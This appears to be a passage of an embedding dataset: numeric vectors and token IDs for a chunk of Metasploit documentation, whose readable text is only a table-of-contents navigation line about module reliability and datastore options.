-0.8048092126846313, 0.9319054484367371, 0.49678122997283936, 1.233736515045166, 0.03420769423246384, 0.857783854007721, -0.15627990663051605, 0.8140929937362671, -0.3250124454498291, 0.7689229249954224, -0.1623345911502838, -1.1292943954467773, -0.3813794255256653, -0.20834818482398987, 0.841225802898407, -0.8817101120948792, -0.04117756709456444, -0.5880985260009766, 0.9681310057640076, 0.5236725807189941, 0.13455849885940552, 0.21562154591083527, 0.07063715904951096, 0.8960924744606018, -0.10311592370271683, 1.1031882762908936, 0.7361752986907959, 0.4624859690666199, -0.3989872932434082, 0.4959818124771118, 0.005911300890147686, 0.11601376533508301, -0.6594940423965454, -0.3591790795326233, -0.1311374306678772, 0.5771486759185791, -0.5783592462539673, 0.7686868906021118, -0.5179867148399353, -0.26499661803245544, 0.014304875396192074, 0.28837332129478455, 0.13944552838802338, -0.36255350708961487, -0.5559274554252625, 0.23985111713409424, 0.07495585083961487, 0.624545693397522, -0.457489937543869, -1.1624109745025635, 0.07972563803195953, 0.4622429609298706, -0.6269259452819824, -0.7969228625297546, 0.8956581354141235, -0.5067050457000732, -0.5813339948654175, 0.1481039673089981, -0.007388526573777199, -0.8458504676818848, -0.3090178668498993, 0.5488431453704834, 0.07737273722887039, -0.1593429148197174, 0.29622945189476013, 0.31376251578330994, 0.4973432719707489, 0.42585331201553345, -0.2972625494003296, 0.04804789647459984, 0.010052633471786976, 0.5820629000663757, -0.3067314624786377, -0.6133263111114502, 0.15689343214035034, 0.08638670295476913, 0.17576509714126587, 0.9354777932167053, 0.07129531353712082, 0.0527765192091465, -0.2576037347316742, 0.6387864947319031, -0.28993168473243713, 0.20518632233142853, 0.36435598134994507, -0.3350050151348114, 0.12535521388053894, 0.1035686731338501, -0.25111740827560425, 0.19003941118717194, 0.5665162801742554, -0.583564817905426, 0.14700476825237274, 0.4590018093585968, -0.622536838054657, 0.937454342842102, 0.22089199721813202, -0.31943923234939575, -0.5283716917037964, -0.3770688474178314, -0.21819190680980682, 0.3804420828819275, -1.1316074132919312, 0.21244020760059357, 0.02620304934680462, -0.07640578597784042, -0.3738180994987488, 0.7261791229248047, -0.21195761859416962, 0.6925962567329407, -0.3206023871898651, -0.5714119076728821, -0.3625166118144989, -0.6667003631591797, -0.14920754730701447, -0.34677210450172424, -1.0553128719329834, -0.6704388856887817, -1.406019926071167, 1.0508066415786743, 0.4617936611175537, -0.15210407972335815, 0.2446746528148651, -0.8044272661209106, 0.41389086842536926, 0.13107314705848694, 0.22062291204929352, 0.9672906398773193, 0.14800865948200226, 0.05305502191185951, -0.6484776735305786, 0.3071627914905548, -0.6450483798980713, 1.1098486185073853, -0.7033435106277466, 0.036151640117168427, 0.039789341390132904, 0.42428529262542725, 0.29611197113990784, -0.20405840873718262, 0.0986199751496315, -0.45146071910858154, -0.846458911895752, 0.006579598877578974, -0.43635934591293335, -0.27733513712882996, -0.015123866498470306, 0.18176592886447906, -0.2593436539173126, 0.4513278603553772, -0.12469688802957535, -0.7046728730201721, 1.3429648876190186, 0.4934728145599365, -0.3174000382423401, 0.8492792248725891, -0.23055844008922577, -0.3333030343055725, -0.9234358668327332, 0.6491373181343079, 0.8550713062286377, 0.8299322128295898, -0.5803526639938354, -0.14851492643356323, -0.5731027722358704, 0.11796209961175919, 0.3965925872325897, -0.5475466847419739, -0.07748127728700638, 0.9131913185119629, 0.20749086141586304, -1.5630422830581665, 0.17760391533374786, -0.054655447602272034, -0.5247148871421814, -0.6803286671638489, 0.005341664422303438, 1.0531039237976074, -0.11390068382024765, 0.5872406959533691, -0.6744107007980347, 0.35214489698410034, 0.34284132719039917, -0.0032280865125358105, 0.535367488861084, -0.40002238750457764, 1.1442863941192627, 0.0015952239045873284, 0.2167464643716812, -0.46581998467445374, -0.09462463855743408, -0.7027671933174133, -0.1271408349275589, -0.33275657892227173, -0.11927156150341034, 0.39431148767471313, 0.2476390153169632, 0.7170411348342896, 0.047776591032743454, 0.9845110177993774, -1.2334076166152954, 0.023624135181307793, -0.5565725564956665, 0.5672042965888977, 0.7053922414779663, 0.5388163924217224, 0.0655883327126503, -0.10630520433187485, -0.496943861246109, -0.8928896188735962, -0.1301586627960205, 0.45411452651023865, 0.5093125700950623, -0.671996533870697, 0.4232248067855835, -0.13942129909992218, -0.063047394156456, -0.042753834277391434, -0.2038268893957138, 0.2286084145307541, 0.25587016344070435, -0.15219898521900177, -0.04848403483629227, -0.1501483917236328, -0.6779569983482361, 0.3716386556625366, 0.49535512924194336, 1.093736171722412, 0.49626120924949646, -0.22536247968673706, -0.6613191366195679, 0.4121817946434021, -0.3444616198539734, -0.24157316982746124, -0.04072479158639908, -0.8045172691345215, 0.6356377601623535, -0.8772993683815002, -0.4416840076446533, -0.9845297336578369, 1.3828606605529785, 0.6847731471061707, 0.8312579989433289, -0.11247893422842026, 0.33936992287635803, 0.004468715749680996, -0.4532804787158966, 0.7280133962631226, -0.05940690264105797, -0.19808010756969452, -1.1585263013839722, 0.8380663394927979, 0.6539376378059387, -0.13175632059574127, 0.023901259526610374, 0.34447866678237915, 0.8507488369941711, 0.7017759084701538, -0.5265797972679138, -0.3772226870059967, -1.110219955444336, 0.2693842649459839, 0.5705724358558655, 0.11133629828691483, -0.9797371029853821, -0.10463255643844604, -0.7530134916305542, -0.24465231597423553, 1.1730512380599976, -1.5403796434402466, 0.09862502664327621, -0.4707942306995392, 0.04933205246925354, 0.7543047070503235, -0.2688427269458771, -0.7052546739578247, 0.07197624444961548, -0.6628742218017578, -1.3622123003005981, 0.724365234375, 0.5160567760467529, 0.09252391010522842, -0.10230231285095215, -0.8343794941902161, 0.24966759979724884, 0.017626779153943062, -0.6191972494125366, -0.45068827271461487, -0.44175130128860474, -0.1407882571220398, -0.04977991059422493, 0.6778166890144348, -0.044603344053030014, 0.05404296889901161, 0.4425673186779022, -0.3193192183971405, 0.6280376315116882, -0.33154794573783875, 0.6027895212173462, -0.3727877140045166, 0.44645124673843384, 0.42405030131340027, 0.16282135248184204, 0.08400727063417435, -0.06548891216516495, -0.3722928762435913, -0.0474562793970108, -0.9708001613616943, -0.9182899594306946, 0.31672459840774536, 0.19658930599689484, -0.41495048999786377, 0.9517375230789185, 0.10387951880693436, -0.6648795008659363, 0.7011234760284424, 0.4540850818157196, -0.03758843243122101, 0.429535448551178, -0.9441829323768616, 0.41776973009109497, 0.4451749324798584, -0.13840048015117645, 0.2822423279285431, -0.7074620127677917, 0.7289724946022034, -0.5830109715461731, -0.07849548757076263, -1.0764654874801636, -0.8914884924888611, -0.003765587694942951, 0.39011067152023315, 0.2550995647907257, 1.1374256610870361, -0.044454947113990784, -0.6155938506126404, -0.48479127883911133, 0.04024135693907738, -0.0011632550740614533, -0.014415763318538666, -0.5951247215270996, 0.0025595282204449177, 0.8287082314491272, -0.12285172194242477, -0.12948772311210632, 0.20441864430904388, -0.6392138004302979, -0.14861822128295898, 0.06636039167642593, 0.4103030860424042, -0.6387768387794495, -0.1278229057788849, 0.1790434867143631, 0.10627409815788269, -0.6675518751144409, 0.23334912955760956, -0.5817108750343323, 0.22130025923252106, 0.517758846282959, -0.2915715277194977, 0.17940236628055573, -0.48844096064567566, -0.4622153639793396, 0.8045979738235474, -0.2658931612968445, -0.8757240772247314, -0.38948583602905273, 0.08068717271089554, 0.10056683421134949, 1.088452696800232, 0.24483910202980042, -1.1074670553207397, -0.7941838502883911, -0.4183271825313568, 0.08552410453557968, -1.330815315246582, -0.14202377200126648, -0.5213439464569092, -1.314872145652771, -0.6526550054550171, 0.8996924757957458, 0.44488731026649475, -1.319104790687561, 0.12496587634086609, -0.4243684709072113, 0.3001749515533447, -0.7223314642906189, 0.26183173060417175, 0.23611070215702057, -0.32903480529785156, -0.6580575108528137, 0.884576141834259, 0.20478428900241852, 0.2382860630750656, -0.28492429852485657, 0.7165742516517639, 0.34961071610450745, 0.3288385272026062, -0.24958376586437225, -0.3660649359226227, 0.38596346974372864, -0.16226641833782196, -0.3922279179096222, 0.7016498446464539, -0.7930888533592224, 0.4778314232826233, -0.21834979951381683, 0.8834353685379028, -0.8023353219032288, 0.23477880656719208, -0.35459285974502563, 0.5021997094154358, 0.41293177008628845, -0.39191338419914246, 1.1617591381072998, -0.07625497877597809, 0.6103556752204895, -0.1548066884279251, 0.1462615579366684, 0.320291131734848, 0.451072096824646, -0.6480856537818909, -0.9052280187606812, 0.5710475444793701, -0.16478709876537323, 0.531343936920166, 0.024530379101634026, -0.04564167931675911, 0.6066646575927734, -0.6242655515670776, 0.9726669788360596, 0.6139134168624878, 0.8701592087745667, 0.49404433369636536, -1.0627975463867188, 1.0005385875701904, 0.9140930771827698, -0.32979831099510193, 0.23879626393318176, 0.26314717531204224, -0.07097530364990234, -0.20842115581035614, 0.18862712383270264, -0.004000244662165642, -0.753311276435852, -0.013624736107885838, 0.6844502687454224, 0.14442192018032074, 0.33342885971069336, -0.583543062210083, -1.030423879623413, -0.018719056621193886, 0.5062350630760193, 0.7067630290985107, 0.5489758849143982, 0.3173583149909973, 0.433043509721756, 0.3791854679584503, 0.26829901337623596, -0.23172719776630402, -0.7591181993484497, -0.6159655451774597, 0.6921617388725281, 0.41638725996017456, 0.35986772179603577, 0.3291601836681366, 0.31103017926216125, -0.9053480625152588, -1.2477807998657227, -1.5016218423843384, 0.05516529455780983, -0.17656967043876648, -0.44404464960098267, -0.4970911145210266, 0.050984811037778854, 0.2485373318195343, 0.8106410503387451, 0.3358756899833679, -0.438981831073761, 0.22576692700386047, -0.35195380449295044, -1.0587364435195923, 0.374843567609787, -0.07390523701906204, 0.8885728716850281, -0.09052685648202896, -0.718987762928009, -1.3334174156188965, -0.06652465462684631, -0.6740043759346008, 0.24576567113399506, 0.44889068603515625, 0.11910008639097214, -0.18427467346191406, 0.7568244934082031, 0.07015392929315567, 0.6346635818481445, -0.019573204219341278, 0.33426210284233093, 0.40532776713371277, -0.61495441198349, -0.4727957248687744, -0.14877435564994812, -0.09327682107686996, -0.3683396577835083, 0.43166086077690125, -0.35799551010131836, 0.18410077691078186, 0.4131520986557007, -0.42389822006225586, 0.22016006708145142, -1.0962392091751099, 0.7941464185714722, -0.9051929712295532, -0.38154008984565735, -0.20772074162960052, -0.10645538568496704, -0.07898134738206863, 0.012027531862258911, -0.07238184660673141, -0.9578471183776855, -0.6581282019615173, 0.2727925479412079, 0.3312886357307434, -1.0578755140304565, -0.8889137506484985, 0.20548292994499207, -0.9903535842895508, -1.3356108665466309, -0.7122458219528198, -0.06506599485874176, -0.6515557169914246, -0.3329886198043823, -0.10380464047193527, -0.22219479084014893, 0.09694958478212357, 0.6147522926330566, 0.477083295583725, 0.5947735905647278, -0.10720425099134445, -0.22912746667861938, -0.17574317753314972, 0.17916393280029297, -0.5265868306159973, 0.4794248640537262, 0.29021891951560974, -0.5233830213546753, 0.7983332872390747, 0.281809538602829, 0.19190937280654907, -0.128957599401474, 0.1705462634563446, 0.3107779324054718, 0.08833438158035278, -1.2386974096298218, 0.29453447461128235, -0.19893623888492584, -0.4803254008293152, -0.06223144754767418, -0.3027401566505432, -0.10318797081708908, -0.18938729166984558, -0.3105360269546509, -0.5253415703773499, 0.4699404835700989, -0.18690088391304016, -0.27577176690101624, 0.027390237897634506, 0.4569447338581085, 0.9587072730064392, -0.06997541338205338, -0.7269890308380127, 0.8806972503662109, 0.748868465423584, 0.11252935230731964, -0.17512035369873047, 0.5954408645629883, 0.1569758802652359, 0.5678266286849976, -0.4526149332523346, 0.16072304546833038, -0.6778125166893005, -0.1529545783996582, -0.09120326489210129, 0.6779785752296448, 0.6594003438949585, -0.15688320994377136, -0.7376258969306946, -0.18560154736042023, 0.018196269869804382, -0.10963943600654602, -0.5472922921180725, 0.053053174167871475, 0.579801082611084, -0.32664063572883606, 0.7135329246520996, -0.30305448174476624, 0.6262097358703613, -0.086368128657341, -0.29043611884117126, -0.7301515936851501, -0.4442315101623535, -0.8699228763580322, 0.7190229296684265, 0.738584041595459, -0.9216273427009583, -0.17406874895095825, -0.21994224190711975, 0.4532220661640167, -0.21813510358333588, -0.7679916620254517, 0.07930212467908859, 0.9752489924430847, 0.12491670250892639, -0.44667521119117737, -0.07395672798156738, -0.22214043140411377, 0.14309938251972198, 0.15591779351234436, -0.45913296937942505, 0.05069915950298309, -0.7339814305305481, 0.09196189045906067, -0.4616624712944031, 0.5620993971824646, -0.7176860570907593, 0.3760841190814972, -0.4993949234485626, 0.1487167626619339, 0.23561671376228333, 0.43969765305519104, -0.31069186329841614, 0.7286580204963684, 0.6944274306297302, 0.12070676684379578, 0.47394275665283203, -0.42598122358322144, -0.2806253433227539, -0.09169687330722809, 1.0161464214324951, 0.7122343182563782, 0.8482075333595276, -0.08691121637821198, 0.48510316014289856, -0.38248956203460693, 0.041470397263765335, -0.17467889189720154, 0.01893392950296402, -0.08471127599477768, -0.3252628743648529, 0.567301869392395, -0.04815365746617317, -0.1401878148317337, 0.0056416625156998634, -0.8579142093658447, 0.23569518327713013, -0.47031161189079285, 0.08481722325086594, -0.7873993515968323, -0.03381820768117905, 0.6800292730331421, -1.1946804523468018, 0.9774610996246338, 0.7438827753067017, -0.7653986811637878, 0.6809689402580261, 0.3515681326389313, -0.427561491727829, 0.8591819405555725, 0.8789687752723694, 0.4651584029197693, -0.12880513072013855, 0.11426687985658646, 0.5442448854446411, 0.22231635451316833, -0.49980345368385315, 0.3286919593811035, -0.4869212508201599, 0.656683087348938, -0.20368075370788574, 0.3599064350128174, -0.5703391432762146, -0.41182568669319153, 0.2455296367406845, 0.4418485760688782, 0.33427146077156067, -0.8702305555343628, -0.15024836361408234, -0.9615460634231567, 0.5423651933670044, -0.1998131424188614, 0.45499834418296814, 0.5154067277908325, -0.4167020916938782, -1.0319098234176636, 0.44462645053863525, -0.16710934042930603, 0.12650452554225922, -0.20759685337543488, 1.6013002395629883, 0.14447717368602753, 0.542390763759613, 0.8349208831787109, 0.1352228969335556, 0.17681172490119934, 0.012402373366057873, -0.4336051642894745, -0.4977392852306366, 0.5819238424301147, -0.10174944996833801, 0.2681632339954376, -0.6333234310150146, -0.5220699906349182, 0.503164529800415, 0.5379693508148193, -0.9445281028747559, -1.105728030204773, 0.7362125515937805, -0.28842419385910034, -1.2854948043823242, -0.3619626760482788, 0.9750126600265503, 0.18208105862140656, 0.5322745442390442, -0.3492307960987091, -0.37795472145080566, -0.19113069772720337, -0.47585195302963257, -0.7238434553146362, 0.46403613686561584, -0.08737073093652725, -0.09738793224096298, 0.004255055449903011, -0.23831601440906525, 0.17284034192562103, 0.02363433688879013, -0.7930166125297546, 0.011681889183819294, 0.6852930188179016, -0.07206638157367706, 0.571162223815918, -0.047561243176460266, -0.49973011016845703, 0.41750240325927734, 0.527584433555603, 0.9586358070373535, 0.556759774684906, 0.8050763607025146, 0.5481377243995667, -0.3213968873023987, -0.36787593364715576, 0.3323526382446289, 0.07361158728599548, -0.00827388558536768, -0.33586421608924866, -0.21874234080314636, 0.10479042679071426, -1.0387133359909058, -1.7913093566894531, -0.1641511619091034, 1.016310691833496, -0.1871269792318344, -0.7222532033920288, 0.013492582365870476, -0.05551346391439438, -0.7413772940635681, -1.179466724395752, -1.0974154472351074, 0.13200078904628754, -0.030183108523488045, -0.37058180570602417, 0.32390373945236206, -0.9032684564590454, 3.8312222957611084, 0.28390786051750183, 0.3661954998970032, 0.2078276425600052, -0.20722204446792603, 1.1765084266662598, 0.03335258737206459, 0.23269344866275787, -0.669233500957489, -0.20078977942466736, 0.7255744338035583, -0.09498515725135803, 0.19318833947181702, 0.29995542764663696, 0.3769986033439636, 0.634670078754425, -0.7502008080482483, 0.2584831714630127, -0.5265926718711853, -1.0234925746917725, -1.5945478677749634, 0.4823203682899475, -0.4226592183113098, 0.35357990860939026, 0.1744387298822403, 0.16851742565631866, -0.35947754979133606, -0.5494199991226196, 0.30590349435806274, -0.5874208211898804, 0.47898685932159424, 0.5329206585884094, 0.805650532245636, -0.5197282433509827, 0.48022928833961487, 0.8755388855934143, 0.26309826970100403, -0.1313084065914154, -0.017093459144234657, 0.17288777232170105, 0.44691723585128784, -0.5971636772155762, 0.03152499347925186, -0.2843751311302185, 0.00008454737690044567, 0.5354166030883789, -0.871631383895874, 0.2509586811065674, -0.057794537395238876, -0.08802343159914017, 0.08764185756444931, 0.25399670004844666, 0.48961225152015686, -0.761777400970459, -0.6849267482757568, 0.66935133934021, -0.0645485371351242, -0.3392736613750458, 0.44373399019241333, 0.28784802556037903, 0.17767883837223053, 0.7391648888587952, -0.4454943835735321, 0.45372939109802246, 0.1549328863620758, 0.5194085240364075, -0.2003847062587738, 0.9254207611083984, -0.4022415280342102, -0.27538836002349854, -0.19027607142925262, 0.18420501053333282, -0.9179046154022217, -1.22783362865448, 0.26827162504196167, 0.03719031810760498, -0.29535338282585144, 0.2780495285987854, 0.3315737545490265, -0.5687873363494873, 0.1701953113079071, 0.037368614226579666, -0.07965707033872604, -0.6556117534637451, -0.16803230345249176, 0.4622667729854584, -0.06110265478491783, -0.2447715401649475, 0.6381993889808655, 0.5799233913421631, 0.9050291180610657, 0.6684443354606628, -0.6285718083381653, 0.03764976188540459, 0.7844783067703247 ]
[ 4130, 1012, 3602, 1011, 1037, 2428, 2965, 2673, 1007, 1024, 1002, 21025, 2102, 10797, 1031, 11336, 4130, 1033, 2043, 2017, 1521, 2128, 2589, 1010, 5245, 2115, 3431, 1010, 2029, 2097, 2039, 11066, 2115, 3642, 2000, 2115, 6556, 3589, 1523, 2026, 1035, 12476, 1035, 3589, 1524, 1012, 2017, 2442, 5245, 2115, 3431, 1999, 2344, 2000, 12040, 1996, 4139, 5227, 2030, 3745, 2009, 2007, 2500, 2006, 1996, 4274, 1012, 1002, 21025, 2102, 5245, 4761, 2026, 1035, 12476, 1035, 3589, 7604, 3126, 2140, 1013, 1038, 4135, 2497, 1013, 3040, 1013, 5622, 2497, 1013, 5796, 2546, 1013, 4563, 1013, 18077, 1012, 21144, 102 ]
metasploit
113.txt
5
[CLS] table of contents definition of module reliability side effects and stability how to use datastore options module reference identifiersback to top [SEP]
[ -0.16654688119888306, -0.08989334106445312, 0.6066464185714722, 0.6351545453071594, -0.7611837983131409, -0.5813365578651428, 0.3095100522041321, -0.2189318984746933, 0.045301422476768494, 0.6037896871566772, -0.2476993352174759, -0.42508357763290405, 0.2442765235900879, -0.31750449538230896, -0.14300605654716492, 0.8691883683204651, -0.44675952196121216, -0.11449963599443436, -1.0581456422805786, 0.44458746910095215, 0.4262448251247406, -0.3064582943916321, -0.739527702331543, -0.12445338815450668, -0.8759334683418274, 0.4120306670665741, -0.4222376346588135, 0.2634899318218231, 1.696934700012207, 1.3423304557800293, 0.224099263548851, -0.03797033801674843, 0.37497448921203613, -0.26568958163261414, 0.22841690480709076, 0.6723819375038147, 0.11815085262060165, -0.11454726755619049, -0.2810398042201996, -1.5307430028915405, 0.11278347671031952, -0.21542052924633026, 0.7834137678146362, -0.4408411979675293, -1.0155075788497925, 0.12210986763238907, 0.09065598249435425, -0.12214668840169907, -0.14386549592018127, -0.7237994074821472, -0.19099187850952148, 0.38409751653671265, 0.5951346755027771, -0.413422167301178, -0.2686446011066437, 0.068507619202137, 0.5129582285881042, 0.3669993579387665, -0.8325386643409729, -0.13297846913337708, -0.047943826764822006, 0.419948935508728, 0.3550143837928772, -0.8324589729309082, 0.3585125207901001, 0.3574097454547882, -0.30995333194732666, 0.18309307098388672, -0.6457920074462891, 0.024370526894927025, -0.12585709989070892, 0.3892975151538849, 0.17052306234836578, -1.2489421367645264, -0.2720690965652466, 0.07849831134080887, 0.8245537281036377, -0.07479698956012726, 0.0653715431690216, 0.19667650759220123, 0.35036158561706543, 1.2554476261138916, 0.45353156328201294, -0.1671285480260849, -0.6771628260612488, -0.1353989690542221, 0.17463764548301697, -0.4509342908859253, -0.38932695984840393, 0.22528262436389923, 0.2691521942615509, 1.120743751525879, 0.14952926337718964, -0.13076265156269073, 0.3705034852027893, 0.524068295955658, -0.40062224864959717, 0.4743010103702545, 0.12340101599693298, 0.27652880549430847, 0.30989038944244385, 0.7716712951660156, -0.18483054637908936, 0.25228151679039, -0.30972909927368164, 0.052585821598768234, 0.9326283931732178, -0.008571050129830837, -0.2571818232536316, -0.6741845607757568, 0.1883537471294403, -0.006030851975083351, -0.30698537826538086, -0.23601888120174408, -0.25706565380096436, 0.8451293110847473, 0.0303057711571455, -0.2038266658782959, -0.6617674827575684, 0.534081757068634, 0.884300172328949, -0.5691179037094116, 0.27622756361961365, -0.5317962765693665, -0.02614257112145424, -0.23834246397018433, -0.07710342109203339, 0.8866385817527771, -0.5580994486808777, -0.7249778509140015, -0.5112362504005432, 0.06190292909741402, 0.8466607928276062, 0.6067616939544678, 0.3437541127204895, -0.17191949486732483, -0.322756290435791, 0.5766922235488892, 0.1568857878446579, -0.07753174006938934, 0.5850268602371216, 0.31207284331321716, 0.40021005272865295, 1.1730334758758545, -0.834343433380127, 0.014259537681937218, 0.15043804049491882, -0.7549785375595093, -0.9598784446716309, 0.3608120083808899, -0.370292067527771, 0.345899760723114, 0.5972455739974976, 0.1134062260389328, 0.36381715536117554, -0.3566681444644928, 0.1653514802455902, 0.6383678913116455, 0.3966163098812103, -0.23076140880584717, -0.05684345215559006, 0.6027947664260864, 0.005901884287595749, 0.4006044864654541, -0.21831457316875458, 0.24268820881843567, -0.3727850914001465, -0.3261014223098755, -0.6718631386756897, -0.26339906454086304, 0.22340652346611023, 0.13625387847423553, -0.3060495853424072, -0.06263720989227295, 0.6294161677360535, 0.4286392033100128, 0.11159230768680573, 0.10245484858751297, 0.5388607978820801, 0.4709622859954834, -0.3349054455757141, 0.32498160004615784, 1.2139949798583984, 0.3057069182395935, -0.08937548100948334, 0.009527439251542091, -0.22273950278759003, -0.06150398030877113, -0.29384878277778625, -0.48485609889030457, -0.157149076461792, 0.16733041405677795, -0.10277334600687027, 0.358020544052124, -0.2802106738090515, 0.09119929373264313, -0.6827517747879028, 0.8728753924369812, -0.4215453565120697, -0.4581775963306427, -0.8421258926391602, -0.32272982597351074, -0.8388232588768005, -0.3282683491706848, 0.544885516166687, -0.8146018981933594, -0.1363842785358429, 0.18808631598949432, -0.06816477328538895, 0.08965636044740677, 0.06954917311668396, 0.4847146272659302, -0.40752315521240234, -0.24018894135951996, 0.5435197353363037, -0.8456171154975891, -0.7468857169151306, 0.11681392043828964, 0.11340709775686264, 0.5845212936401367, 0.10230056196451187, -0.36373263597488403, 0.4733218550682068, 0.38196316361427307, -0.1460777372121811, -0.22541309893131256, 0.152930349111557, 0.9537575840950012, 0.11384610831737518, 0.4192275404930115, 0.34013932943344116, 0.8809579610824585, 0.13531696796417236, 0.8154023885726929, 0.9153648614883423, 0.09094838052988052, 0.5876433849334717, 0.17720431089401245, -0.10031390190124512, 1.0432244539260864, 0.5417101383209229, -0.06263300031423569, 0.2237890660762787, 0.3680019974708557, -0.10402708500623703, -0.5487726926803589, -0.035980306565761566, -0.12533490359783173, -0.2447907030582428, 0.9215288162231445, -0.233099564909935, 0.8929629921913147, 0.0920516699552536, -0.6077307462692261, -0.41428104043006897, -0.5299942493438721, -0.4680595099925995, 0.2982059121131897, -1.4663896560668945, 0.006627462338656187, 0.3661097288131714, 0.6740615963935852, -0.28501731157302856, 0.0802026242017746, 0.5544130802154541, 0.6571656465530396, 0.4402764141559601, 0.24940216541290283, -0.4460519552230835, -0.48454031348228455, -0.8012572526931763, -0.7207666635513306, -0.21322517096996307, 0.12139718979597092, -1.2092958688735962, 0.07122325152158737, 0.06551436334848404, -0.8723054528236389, 0.3371780514717102, -0.4205612242221832, 0.38474878668785095, -0.13196533918380737, 0.42494919896125793, 0.15401341021060944, 0.5491820573806763, 0.18406081199645996, -0.986646831035614, 0.3599083125591278, -0.6415517926216125, 0.059834618121385574, -0.2943568825721741, 0.11972297728061676, 0.27551305294036865, -0.04464804381132126, 0.7543481588363647, 0.05818728357553482, -0.1511446237564087, -0.046524859964847565, -1.0668655633926392, -0.9173638224601746, -0.7751979827880859, -0.3823354244232178, -0.44582459330558777, 0.1088753268122673, -0.601883053779602, 0.662666916847229, 0.018989156931638718, 0.11211628466844559, 0.5510126948356628, 0.5951161980628967, -0.8146218061447144, 0.10322581231594086, 0.007229326758533716, -0.8244910836219788, -0.9308923482894897, 0.3480183780193329, 0.4544611871242523, -0.19445694983005524, 0.09329063445329666, 0.10404013097286224, -0.5101466774940491, 0.6844431757926941, 0.7292199730873108, -1.0649263858795166, -0.25722262263298035, 1.0766267776489258, -0.43451571464538574, -1.3357363939285278, 0.5555056929588318, -0.8048292994499207, -0.5755754113197327, 0.23895582556724548, 0.027634022757411003, -0.23803484439849854, 0.29826149344444275, 0.6188347339630127, -0.8787288069725037, -0.22303666174411774, 0.12677255272865295, 0.2781727612018585, -0.275015264749527, -0.1764523684978485, 0.4016803801059723, 0.07281768321990967, -0.710166335105896, -0.11250916868448257, 0.20940527319908142, -0.3133556544780731, -0.24930055439472198, -0.17677100002765656, 0.4241124093532562, 0.2697247862815857, 0.6522700190544128, 0.06393374502658844, 0.511092483997345, 1.0994727611541748, -0.14081120491027832, 0.6922963857650757, 0.3915324807167053, -0.08255287259817123, 0.40498360991477966, 0.885979175567627, -0.1713167428970337, -0.23608626425266266, -0.392423540353775, -0.4355904757976532, 0.01906421408057213, 0.8125796318054199, 0.801189661026001, -1.04201340675354, 0.767240583896637, -0.21009604632854462, -0.4884166717529297, 0.48538944125175476, 0.6456323862075806, -0.5246099233627319, 1.0861458778381348, 0.03127020597457886, 0.9128236770629883, 0.2586963176727295, -0.3395636975765228, 0.3551079034805298, 0.6564698219299316, -0.5401221513748169, -0.012943821959197521, -0.2895231246948242, -0.8501346111297607, -0.41037389636039734, -0.8140982389450073, -0.2924604117870331, 0.10453034192323685, -1.110579252243042, -0.035758182406425476, -0.22139595448970795, -0.5052053928375244, -0.8545599579811096, 0.317194402217865, 0.5873009562492371, 0.5160595774650574, -0.07816905528306961, 0.4082925021648407, 0.9529028534889221, -0.5641620755195618, 0.4053637981414795, 0.12354206293821335, -0.5845120549201965, -0.6666003465652466, 0.24555478990077972, 0.20850419998168945, -0.19412857294082642, -0.31420761346817017, -0.32679441571235657, -0.35792601108551025, -0.08301377296447754, -0.23631715774536133, 0.23772509396076202, -0.24585235118865967, 0.013376981019973755, 0.26504430174827576, 0.9883810877799988, 0.6887353658676147, -0.46766844391822815, -0.37867891788482666, 0.3828630745410919, 0.49034667015075684, -0.7860919237136841, 0.30359917879104614, -0.06587952375411987, 0.12323307245969772, 1.0049710273742676, -0.3867339491844177, -0.9439200162887573, -0.6150827407836914, -0.3559974730014801, -0.7551950216293335, 0.4633278250694275, 1.238308072090149, -0.41140976548194885, 0.2209342122077942, -0.2951712906360626, 0.627743661403656, -0.38129523396492004, -0.313847154378891, -0.14993633329868317, -0.069716677069664, 0.16535624861717224, -0.20966173708438873, 0.09392356127500534, 0.4197041094303131, -0.23577149212360382, 0.4506100118160248, -0.49507302045822144, 0.8040139079093933, -0.8704350590705872, 0.016137218102812767, -0.10576276481151581, 0.579460620880127, -0.49461302161216736, 0.17755556106567383, -0.48638150095939636, 0.5700358748435974, -0.5771536827087402, 0.16626988351345062, -0.2706844210624695, 0.0779084712266922, 0.7708753347396851, -0.7015045881271362, -0.47275078296661377, 1.3006861209869385, -0.2543107271194458, -0.5451509356498718, 0.2526204586029053, -0.21603916585445404, -0.41881754994392395, -0.2809404134750366, -0.6043192744255066, -0.37018123269081116, -0.6037302613258362, -0.5869413018226624, -0.3224601149559021, -0.29792967438697815, 0.7313860654830933, 0.22170980274677277, -0.028605222702026367, -0.4391048848628998, -0.6005879044532776, -0.9144291877746582, 0.6960560083389282, -0.948792576789856, 0.489050030708313, -0.6120496988296509, -0.8865824341773987, -0.17353658378124237, -0.5761744976043701, -0.7242450714111328, -0.7347047328948975, -0.18559810519218445, -0.2236355096101761, 0.49385783076286316, -0.020146438851952553, 0.978506863117218, -0.06673986464738846, -1.2500978708267212, 0.7028121948242188, -0.10757305473089218, 0.17384366691112518, -0.7274993658065796, -0.06899382174015045, 0.6617107391357422, 0.2728433609008789, -0.7031934261322021, -0.002229565754532814, -0.6051675081253052, -0.11841525137424469, -0.13075774908065796, -1.255118489265442, 0.27716997265815735, -0.12389591336250305, 0.24851687252521515, 0.12481767684221268, 1.5592730045318604, -1.1033282279968262, -0.5080597400665283, 0.17662560939788818, 0.03418832644820213, 0.8869286179542542, -0.3638301491737366, -0.5299873948097229, 0.004859215579926968, -0.8629326820373535, -0.1159566268324852, -0.011872162111103535, 0.17698556184768677, -0.6533823013305664, 0.11283458024263382, -0.32070937752723694, -0.14837701618671417, 1.1894824504852295, -0.27097630500793457, -0.08240984380245209, -0.08380602300167084, 0.2744468152523041, -0.5976204872131348, -0.09915926307439804, 0.5691366791725159, -0.24556374549865723, -0.07788684964179993, 1.1163334846496582, 0.059202052652835846, -0.1302572339773178, 0.3325691521167755, 0.00902937725186348, 0.6935796141624451, 0.5684000253677368, -0.7570886611938477, 0.3324780762195587, -0.13355331122875214, 0.26454436779022217, 0.2559593915939331, 0.6666689515113831, -0.67289137840271, 0.6443660259246826, -1.3818224668502808, 0.5667442083358765, 0.2575280964374542, 0.3384009301662445, -0.3714536130428314, 0.8170076012611389, 0.5789105892181396, -0.3104637563228607, 0.28435611724853516, -0.4077164828777313, 0.1868678778409958, 0.3469134569168091, 0.06986058503389359, -0.3004598915576935, -0.25322389602661133, -0.5898153185844421, -0.770582377910614, 0.42951303720474243, -0.5400779843330383, 0.4231378138065338, 0.5860824584960938, -1.2233206033706665, 0.22721679508686066, 0.03354000672698021, 0.853779673576355, 1.4104254245758057, 1.0729799270629883, 0.19514970481395721, -0.36668384075164795, -0.12230748683214188, 0.9277580976486206, -0.37699469923973083, 0.37227198481559753, 